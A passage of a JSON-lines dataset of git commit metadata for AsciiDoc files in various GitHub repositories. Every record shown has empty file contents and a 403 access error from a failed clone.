1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6bb3ba821ba6bad2c7398e90a7e13a63882138ab","subject":"Update 2016-10-07-Making-the-best-of-a-hurricane-at-WDW.adoc","message":"Update 2016-10-07-Making-the-best-of-a-hurricane-at-WDW.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-10-07-Making-the-best-of-a-hurricane-at-WDW.adoc","new_file":"_posts\/2016-10-07-Making-the-best-of-a-hurricane-at-WDW.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af5cc33312cc752bacf02a4ee602c0749d4aee47","subject":"Update 2017-01-10-rub-docker-compose-in-cron-job.adoc","message":"Update 2017-01-10-rub-docker-compose-in-cron-job.adoc","repos":"ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io,ioisup\/ioisup.github.io","old_file":"_posts\/2017-01-10-rub-docker-compose-in-cron-job.adoc","new_file":"_posts\/2017-01-10-rub-docker-compose-in-cron-job.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ioisup\/ioisup.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbdf912a8e3cdb36bf58ce32836497e0cddfb09c","subject":"Delete Administration.adoc","message":"Delete Administration.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"Administration.adoc","new_file":"Administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90d8e9a1185d16ebf01ad3d8d176d069ba756343","subject":"y2b create post How Many Balls In This Mercedes-Benz?","message":"y2b create post How Many Balls In This Mercedes-Benz?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-30-How-Many-Balls-In-This-MercedesBenz.adoc","new_file":"_posts\/2017-01-30-How-Many-Balls-In-This-MercedesBenz.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04dfb334b13079a95c5e6ee62ec54c9a84e6f25b","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 
2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"888f2f4d75951ecd88d214307f823b9b172626e9","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"329c058b82709feedd45482a6948ae86d5b976bb","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecb8e8d5cd7910efd75de2112604e9cc22ac64ec","subject":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","message":"Update 2016-08-26-guidelines-with-google-apps-script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_file":"_posts\/2016-08-26-guidelines-with-google-apps-script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f39ca589629f9f139681c4ce7661846f54a4b7a1","subject":"Update 2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","message":"Update 2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","new_file":"_posts\/2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19c3c8197c7e4111017c283159753b18b2abb89f","subject":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","message":"Update 2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_file":"_posts\/2017-02-09-Distracted-confused-and-definately-not-about-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3f5c4e8810c36e6860fd9586cc5aa7d8a07c724","subject":"refactor(Ch1): Promises\u306e\u4ed5\u69d8\u3078\u306e\u30ea\u30f3\u30af\u3092\u5185\u90e8\u7684\u306a\u3082\u306e\u3078\u3068\u5909\u66f4","message":"refactor(Ch1): Promises\u306e\u4ed5\u69d8\u3078\u306e\u30ea\u30f3\u30af\u3092\u5185\u90e8\u7684\u306a\u3082\u306e\u3078\u3068\u5909\u66f4\n","repos":"tangjinzhou\/promises-book,oToUC\/promises-book,mzbac\/promises-book,genie88\/promises-book,dieface\/promises-book,wenber\/promises-book,genie88\/promises-book,genie88\/promises-book,wangwei1237\/promises-book,sunfurong\/promise,wenber\/promises-book,purepennons\/promises-book,liubin\/promises-book,lidasong2014\/promises-book,xifeiwu\/promises-book,dieface\/promises-book,liyunsheng\/promises-book,azu\/promises-book,lidasong2014\/promises-book,cqricky\/promises-book,liubin\/promises-book,sunfurong\/promise,wangwei1237\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,dieface\/promises-book,azu\/promises-book,xifeiwu\/promises-book,cqricky\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,wenber\/promises-book,tangjinzhou\/promises-book,wangwei1237\/promises-book,azu\/promises-book,liubin\/promises-book,charlenopires\/promises-book,purepennons\/promises-book,charlenopires\/promises-book,purepennons\/promises-book,liyunsheng\/promises-book,charlenopires\/promises-book,cqricky\/promises-book,oToUC\/promises-book,azu\/promises-book,oToUC\/promises-book,xifeiwu\/promises-book","old_file":"Ch1_WhatsPromises\/promise-overview.adoc","new_file":"Ch1_WhatsPromises\/promise-overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8482a88e555bba3ac5918a6dd1e71958a7b625e","subject":"Update 2018-02-02-S-Y-S-T-E-M.adoc","message":"Update 2018-02-02-S-Y-S-T-E-M.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-S-Y-S-T-E-M.adoc","new_file":"_posts\/2018-02-02-S-Y-S-T-E-M.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e14e2534f7205a06fab8692aad830a660e5a8454","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 
2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae498cc595c78e62bffbe2e4f5b15c6aa3438d08","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ef5bb4355164ef55060806d2bf2b5aa724f8e64","subject":"Minor edits to styleguide","message":"Minor edits to styleguide","repos":"vonnopsled\/artifacts,destijl\/artifacts,crankyoldgit\/artifacts,pidydx\/artifacts,sebastianwelsh\/artifacts,keithtyler\/artifacts,keithtyler\/artifacts,vonnopsled\/artifacts,pidydx\/artifacts,destijl\/artifacts,crankyoldgit\/artifacts,sebastianwelsh\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crankyoldgit\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dc84eebe63197fcba4e2681d05d1adeb77d1832b","subject":"Small changes to documentation.","message":"Small changes to documentation.\n","repos":"ForensicArtifacts\/artifacts,Onager\/artifacts,joachimmetz\/artifacts,ForensicArtifacts\/artifacts,pstirparo\/artifacts,pstirparo\/artifacts,Onager\/artifacts,joachimmetz\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Onager\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"41e1f35792e633ecc195d412441a312dfd145886","subject":"Update 2016-02-09-Behaviour-driven-development-in-action.adoc","message":"Update 2016-02-09-Behaviour-driven-development-in-action.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-02-09-Behaviour-driven-development-in-action.adoc","new_file":"_posts\/2016-02-09-Behaviour-driven-development-in-action.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e4f3831806442ee455cf3d376710aa5aa84c361","subject":"y2b create post The Best Instagram Camera Ever Created","message":"y2b create post The Best Instagram Camera Ever 
Created","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-09-The-Best-Instagram-Camera-Ever-Created.adoc","new_file":"_posts\/2016-08-09-The-Best-Instagram-Camera-Ever-Created.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e4a41cd78a8fadefede5e19e1ea2f92ebc18895","subject":"Adding Resource Adaptors index","message":"Adding Resource Adaptors index\n","repos":"RestComm\/documentation,RestComm\/documentation","old_file":"core\/src\/main\/asciidoc\/jain-slee\/Resource-Adaptors.adoc","new_file":"core\/src\/main\/asciidoc\/jain-slee\/Resource-Adaptors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RestComm\/documentation.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"1816a815617cfd3d187f65e716ed5df9932fb221","subject":"Update 2015-03-04-Getting-Set-Up.adoc","message":"Update 2015-03-04-Getting-Set-Up.adoc","repos":"caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io,caryfitzhugh\/caryfitzhugh.github.io","old_file":"_posts\/2015-03-04-Getting-Set-Up.adoc","new_file":"_posts\/2015-03-04-Getting-Set-Up.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/caryfitzhugh\/caryfitzhugh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3c3e5a5088e60f50f77d85d6747c395b281b460","subject":"Update 2016-03-29-Glosario.adoc","message":"Update 2016-03-29-Glosario.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Glosario.adoc","new_file":"_posts\/2016-03-29-Glosario.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f665249cd9f090180c3b674ac9c056d3af5ca07c","subject":"Update 2019-10-01-Cross-Platform-Mobile-Data-Acquisition.adoc","message":"Update 2019-10-01-Cross-Platform-Mobile-Data-Acquisition.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2019-10-01-Cross-Platform-Mobile-Data-Acquisition.adoc","new_file":"_posts\/2019-10-01-Cross-Platform-Mobile-Data-Acquisition.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b55e2d0934e36904887e6bf99a36ba9317240eab","subject":"y2b create post Check out this BEAST! -- In Win D-Frame PC Case (CES 2013)","message":"y2b create post Check out this BEAST! 
-- In Win D-Frame PC Case (CES 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-12-Check-out-this-BEAST--In-Win-DFrame-PC-Case-CES-2013.adoc","new_file":"_posts\/2013-01-12-Check-out-this-BEAST--In-Win-DFrame-PC-Case-CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c49b5d6e3f37ed93e9b763d23ac15db43e38e43e","subject":"Wording","message":"Wording\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Ex\u00e9cution\/Print exec.adoc","new_file":"Ex\u00e9cution\/Print exec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0061e84a59a6f12ff982863f803b46f7699c9bf1","subject":"Document DevTools' requirement for shutdown hook to be registered","message":"Document DevTools' requirement for shutdown hook to be registered\n\nCloses gh-4153\n","repos":"jmnarloch\/spring-boot,bijukunjummen\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,kdvolder\/spring-boot,mosoft521\/spring-boot,philwebb\/spring-boot-concourse,lburgazzoli\/spring-boot,royclarkson\/spring-boot,rweisleder\/spring-boot,ihoneymon\/spring-boot,jayarampradhan\/spring-boot,vpavic\/spring-boot,wilkinsona\/spring-boot,Buzzardo\/spring-boot,shangyi0102\/spring-boot,lucassaldanha\/spring-boot,shangyi0102\/spring-boot,ilayaperumalg\/spring-boot,linead\/spring-boot,tsachev\/spring-boot,scottfrederick\/spring-boot,bijukunjummen\/spring-boot,isopov\/spring-boot,bclozel\/spring-boot,mbogoevici\/spring-boot,kamilszymanski\/spring-boot,vakninr\/spring-boot,spring-projects\/spring-boot,kdvolder\/spring-boot,lucassaldanha\/spring-boot,xiaoleiPENG\/my-project,hqrt\/jenkins2-course-spring-boot,afroje-reshma\/spring-boot-sample,vakninr\/spring-boot,drumonii\/spring-boot,spring-projects\/spring-boot,habuma\/spring-boot,qerub\/spring-boot,hello2009chen\/spring-boot,minmay\/spring-boot,olivergierke\/spring-boot,scottfrederick\/spring-boot,vpavic\/spring-boot,dfa1\/spring-boot,joansmith\/spring-boot,sbuettner\/spring-boot,linead\/spring-boot,SaravananParthasarathy\/SPSDemo,afroje-reshma\/spring-boot-sample,habuma\/spring-boot,akmaharshi\/jenkins,donhuvy\/spring-boot,mdeinum\/spring-boot,sbcoba\/spring-boot,dreis2211\/spring-boot,joansmith\/spring-boot,mosoft521\/spring-boot,chrylis\/spring-boot,bclozel\/spring-boot,tsachev\/spring-boot,bjornlindstrom\/spring-boot,pvorb\/spring-boot,hqrt\/jenkins2-course-spring-boot,donhuvy\/spring-boot,joshiste\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,izeye\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,pvorb\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,chrylis\/spring-boot,deki\/spring-boot,dreis2211\/spring-boot,wilkinsona\/spring-boot,ollie314\/spring-boot,minmay\/spring-boot,mosoft521\/spring-boot,Buzzardo\/spring-boot,donhuvy\/spring-boot,eddumelendez\/spring-boot,scottfrederick\/spring-boot,deki\/spring-boot,joshiste\/spring-boot,rweisleder\/spring-boot,nebhale\/spring-boot,sbuettner\/spring-boot,sbcoba\/spring-boot,olivergierke\/spring-boot,brettwooldridge\/spring-boot,htynkn\/spring-boot,akmaharshi\/jenkins,SaravananParthas
arathy\/SPSDemo,kamilszymanski\/spring-boot,sbuettner\/spring-boot,michael-simons\/spring-boot,eddumelendez\/spring-boot,lenicliu\/spring-boot,dfa1\/spring-boot,aahlenst\/spring-boot,ihoneymon\/spring-boot,dreis2211\/spring-boot,mdeinum\/spring-boot,hqrt\/jenkins2-course-spring-boot,joshthornhill\/spring-boot,michael-simons\/spring-boot,Nowheresly\/spring-boot,yhj630520\/spring-boot,jvz\/spring-boot,tsachev\/spring-boot,htynkn\/spring-boot,lenicliu\/spring-boot,qerub\/spring-boot,ihoneymon\/spring-boot,bjornlindstrom\/spring-boot,drumonii\/spring-boot,mrumpf\/spring-boot,tiarebalbi\/spring-boot,yhj630520\/spring-boot,jvz\/spring-boot,izeye\/spring-boot,michael-simons\/spring-boot,htynkn\/spring-boot,mbogoevici\/spring-boot,herau\/spring-boot,felipeg48\/spring-boot,drumonii\/spring-boot,felipeg48\/spring-boot,jayarampradhan\/spring-boot,spring-projects\/spring-boot,herau\/spring-boot,olivergierke\/spring-boot,isopov\/spring-boot,vakninr\/spring-boot,pvorb\/spring-boot,michael-simons\/spring-boot,spring-projects\/spring-boot,brettwooldridge\/spring-boot,candrews\/spring-boot,bjornlindstrom\/spring-boot,dfa1\/spring-boot,sebastiankirsch\/spring-boot,shangyi0102\/spring-boot,mbogoevici\/spring-boot,habuma\/spring-boot,sebastiankirsch\/spring-boot,Buzzardo\/spring-boot,bclozel\/spring-boot,NetoDevel\/spring-boot,htynkn\/spring-boot,royclarkson\/spring-boot,herau\/spring-boot,lucassaldanha\/spring-boot,brettwooldridge\/spring-boot,sbcoba\/spring-boot,shangyi0102\/spring-boot,mdeinum\/spring-boot,xiaoleiPENG\/my-project,isopov\/spring-boot,ameraljovic\/spring-boot,jbovet\/spring-boot,Nowheresly\/spring-boot,tiarebalbi\/spring-boot,eddumelendez\/spring-boot,vakninr\/spring-boot,minmay\/spring-boot,philwebb\/spring-boot-concourse,nebhale\/spring-boot,bijukunjummen\/spring-boot,yangdd1205\/spring-boot,philwebb\/spring-boot-concourse,i007422\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,hello2009chen\/spring-boot,lexandro\/spring-boot,akmaharshi\/jenkins,zhangshuangquan\/spring-root,qerub\/spring-boot,nebhale\/spring-boot,ollie314\/spring-boot,dfa1\/spring-boot,dreis2211\/spring-boot,philwebb\/spring-boot,mbenson\/spring-boot,wilkinsona\/spring-boot,kdvolder\/spring-boot,NetoDevel\/spring-boot,lburgazzoli\/spring-boot,neo4j-contrib\/spring-boot,htynkn\/spring-boot,joshiste\/spring-boot,drumonii\/spring-boot,vakninr\/spring-boot,lenicliu\/spring-boot,i007422\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,bclozel\/spring-boot,spring-projects\/spring-boot,NetoDevel\/spring-boot,mdeinum\/spring-boot,jxblum\/spring-boot,ollie314\/spring-boot,DeezCashews\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,hqrt\/jenkins2-course-spring-boot,deki\/spring-boot,joansmith\/spring-boot,royclarkson\/spring-boot,bbrouwer\/spring-boot,jxblum\/spring-boot,ollie314\/spring-boot,bbrouwer\/spring-boot,kdvolder\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ilayaperumalg\/spring-boot,mbenson\/spring-boot,sebastiankirsch\/spring-boot,tsachev\/spring-boot,mrumpf\/spring-boot,chrylis\/spring-boot,tsachev\/spring-boot,kamilszymanski\/spring-boot,thomasdarimont\/spring-boot,zhangshuangquan\/spring-root,tiarebalbi\/spring-boot,RichardCSantana\/spring-boot,jxblum\/spring-boot,olivergierke\/spring-boot,lburgazzoli\/spring-boot,DeezCashews\/spring-boot,linead\/spring-boot,shakuzen\/spring-boot,zhanhb\/spring-boot,jmnarloch\/spring-boot,joansmith\/spring-boot,neo4j-contrib\/spring-boot,ihoneymon\/spring-boot,hello2009chen\/spring-boot,habuma\/spring-boot,wilkinsona\/spring-boot,aahlenst\/spring
-boot,eddumelendez\/spring-boot,sbuettner\/spring-boot,mdeinum\/spring-boot,bclozel\/spring-boot,mrumpf\/spring-boot,chrylis\/spring-boot,zhanhb\/spring-boot,mbenson\/spring-boot,linead\/spring-boot,DeezCashews\/spring-boot,srikalyan\/spring-boot,joshthornhill\/spring-boot,mosoft521\/spring-boot,bbrouwer\/spring-boot,nebhale\/spring-boot,philwebb\/spring-boot,i007422\/jenkins2-course-spring-boot,bijukunjummen\/spring-boot,philwebb\/spring-boot,javyzheng\/spring-boot,zhanhb\/spring-boot,sbuettner\/spring-boot,minmay\/spring-boot,Buzzardo\/spring-boot,michael-simons\/spring-boot,srikalyan\/spring-boot,Nowheresly\/spring-boot,shakuzen\/spring-boot,hello2009chen\/spring-boot,javyzheng\/spring-boot,SaravananParthasarathy\/SPSDemo,lenicliu\/spring-boot,mrumpf\/spring-boot,jayarampradhan\/spring-boot,chrylis\/spring-boot,hqrt\/jenkins2-course-spring-boot,joshthornhill\/spring-boot,SaravananParthasarathy\/SPSDemo,pvorb\/spring-boot,afroje-reshma\/spring-boot-sample,mevasaroj\/jenkins2-course-spring-boot,thomasdarimont\/spring-boot,DeezCashews\/spring-boot,shakuzen\/spring-boot,felipeg48\/spring-boot,jvz\/spring-boot,bjornlindstrom\/spring-boot,candrews\/spring-boot,javyzheng\/spring-boot,rweisleder\/spring-boot,tiarebalbi\/spring-boot,neo4j-contrib\/spring-boot,jbovet\/spring-boot,habuma\/spring-boot,i007422\/jenkins2-course-spring-boot,RichardCSantana\/spring-boot,vpavic\/spring-boot,yhj630520\/spring-boot,srikalyan\/spring-boot,javyzheng\/spring-boot,philwebb\/spring-boot,vpavic\/spring-boot,neo4j-contrib\/spring-boot,yangdd1205\/spring-boot,shakuzen\/spring-boot,chrylis\/spring-boot,jxblum\/spring-boot,DeezCashews\/spring-boot,sebastiankirsch\/spring-boot,bijukunjummen\/spring-boot,ilayaperumalg\/spring-boot,deki\/spring-boot,ameraljovic\/spring-boot,ptahchiev\/spring-boot,qerub\/spring-boot,ollie314\/spring-boot,jmnarloch\/spring-boot,sebastiankirsch\/spring-boot,wilkinsona\/spring-boot,joansmith\/spring-boot,jbovet\/spring-boot,jvz\/spring-boot,afroje-reshma\/spring-boot-sample,lexandro\/spring-boot,dfa1\/spring-boot,kamilszymanski\/spring-boot,jbovet\/spring-boot,habuma\/spring-boot,dreis2211\/spring-boot,mdeinum\/spring-boot,candrews\/spring-boot,jxblum\/spring-boot,akmaharshi\/jenkins,htynkn\/spring-boot,shangyi0102\/spring-boot,Nowheresly\/spring-boot,ilayaperumalg\/spring-boot,akmaharshi\/jenkins,brettwooldridge\/spring-boot,ilayaperumalg\/spring-boot,lexandro\/spring-boot,felipeg48\/spring-boot,sbcoba\/spring-boot,candrews\/spring-boot,donhuvy\/spring-boot,aahlenst\/spring-boot,aahlenst\/spring-boot,Nowheresly\/spring-boot,shakuzen\/spring-boot,jxblum\/spring-boot,joshiste\/spring-boot,NetoDevel\/spring-boot,xiaoleiPENG\/my-project,ptahchiev\/spring-boot,lucassaldanha\/spring-boot,ihoneymon\/spring-boot,aahlenst\/spring-boot,i007422\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,bbrouwer\/spring-boot,bbrouwer\/spring-boot,afroje-reshma\/spring-boot-sample,drumonii\/spring-boot,ihoneymon\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,zhangshuangquan\/spring-root,isopov\/spring-boot,xiaoleiPENG\/my-project,isopov\/spring-boot,bjornlindstrom\/spring-boot,jmnarloch\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,yangdd1205\/spring-boot,ptahchiev\/spring-boot,jbovet\/spring-boot,scottfrederick\/spring-boot,rweisleder\/spring-boot,cleverjava\/jenkins2-course-spring-boot,izeye\/spring-boot,yhj630520\/spring-boot,jayarampradhan\/spring-boot,nebhale\/spring-boot,eddumelendez\/spring-boot,donhuvy\/spring-boot,mrumpf\/spring-boot,philw
ebb\/spring-boot-concourse,ameraljovic\/spring-boot,herau\/spring-boot,ilayaperumalg\/spring-boot,yhj630520\/spring-boot,felipeg48\/spring-boot,thomasdarimont\/spring-boot,joshiste\/spring-boot,thomasdarimont\/spring-boot,izeye\/spring-boot,kamilszymanski\/spring-boot,Buzzardo\/spring-boot,zhanhb\/spring-boot,isopov\/spring-boot,rweisleder\/spring-boot,philwebb\/spring-boot,RichardCSantana\/spring-boot,mbogoevici\/spring-boot,kdvolder\/spring-boot,lucassaldanha\/spring-boot,joshthornhill\/spring-boot,tiarebalbi\/spring-boot,ameraljovic\/spring-boot,vpavic\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,wilkinsona\/spring-boot,spring-projects\/spring-boot,javyzheng\/spring-boot,ameraljovic\/spring-boot,RichardCSantana\/spring-boot,mosoft521\/spring-boot,zhanhb\/spring-boot,scottfrederick\/spring-boot,dreis2211\/spring-boot,joshiste\/spring-boot,scottfrederick\/spring-boot,lexandro\/spring-boot,kdvolder\/spring-boot,izeye\/spring-boot,qerub\/spring-boot,olivergierke\/spring-boot,rweisleder\/spring-boot,hello2009chen\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot-concourse,minmay\/spring-boot,thomasdarimont\/spring-boot,vpavic\/spring-boot,tsachev\/spring-boot,tiarebal